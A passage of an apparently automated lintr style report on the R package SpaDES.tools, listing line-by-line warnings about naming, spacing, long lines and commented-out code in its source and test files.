{\n                        ^\n```\n[R/neighbourhood.R:860:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L860) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:869:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L869) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:872:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L872) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds))\n      ^\n```\n[R/neighbourhood.R:884:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L884) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:909:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L909) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:910:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L910) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:919:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L919) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds, withHeading) {\n                        ^\n```\n[R/neighbourhood.R:922:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L922) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      X <- wrap(X, bounds = extent(bounds), withHeading = withHeading)\n      ^\n```\n[R/neighbourhood.R:1059:40:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L1059) *style:* **Commas should always have a space after.**\n```r\n​  cc <- cbind(pureCircle2[, \"x\"] - xy[,\"x\"], pureCircle2[, \"y\"] - xy[, \"y\"])\n                                       ^\n```\n[R/probability.R:41:35:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/probability.R#L41) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    1 / sqrt(var * 2 * pi) * exp(-((theta - mu + 2 * pi * k) ^ 2) / (2 * var))\n                                  ^\n```\n[R/probability.R:44:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/probability.R#L44) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Next <- term(theta, mu, var, k)\n  ^~~~\n```\n[R/probability.R:45:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/probability.R#L45) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Last <- Next\n  ^~~~\n```\n[R/RcppExports.R:68:20:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/RcppExports.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​runifC <- function(N) {\n                   ^\n```\n[R/RcppExports.R:71:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/RcppExports.R#L71) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/SELES.R:53:23:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/SELES.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​numAgents <- function(N, probInit) {\n                      ^\n```\n[R/spades-tools-deprecated.R:53:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spades-tools-deprecated.R#L53) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/splitRaster.R:116:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/splitRaster.R#L116) *style:* **Lines should not be more than 100 characters.**\n```r\n​      clusterApplyLB(cl = cl, x = seq_along(extents), fun = croppy, e = extents, r = r, path = path, rType = rType)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:538:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread.R#L538) *style:* **Commented code should be removed.**\n```r\n​      #isNASpreadProb <- is.na(spreadProb[])\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:540:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread.R#L540) *style:* **Commented code should be removed.**\n```r\n​      #   isNASpreadProb <- is.na(spreadProb[])\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:541:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread.R#L541) *style:* **Commented code should be removed.**\n```r\n​      #   spreadProb[isNASpreadProb] <- 0L\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread.R:942:41:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread.R#L942) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​              notDupsEvents <- notDups[-(1:(nrSpreads - nrPotentials))]\n                                        ^\n```\n[R/spread2.R:5:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L5) *style:* **Lines should not be more than 100 characters.**\n```r\n​                           \"quantityAdj\", \"quantityAdj2\", \"state\", \"size\", \"tooBigByNCells\", \"V1\", \"proportion\"\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:674:12:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L674) *style:* **Commented code should be removed.**\n```r\n​          #pureCircle <- unique(pureCircle)\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:5:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-examples.R#L5) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:16:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-examples.R#L16) *style:* **Commas should never have a space before.**\n```r\n​  } , add = TRUE)\n   ~^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = 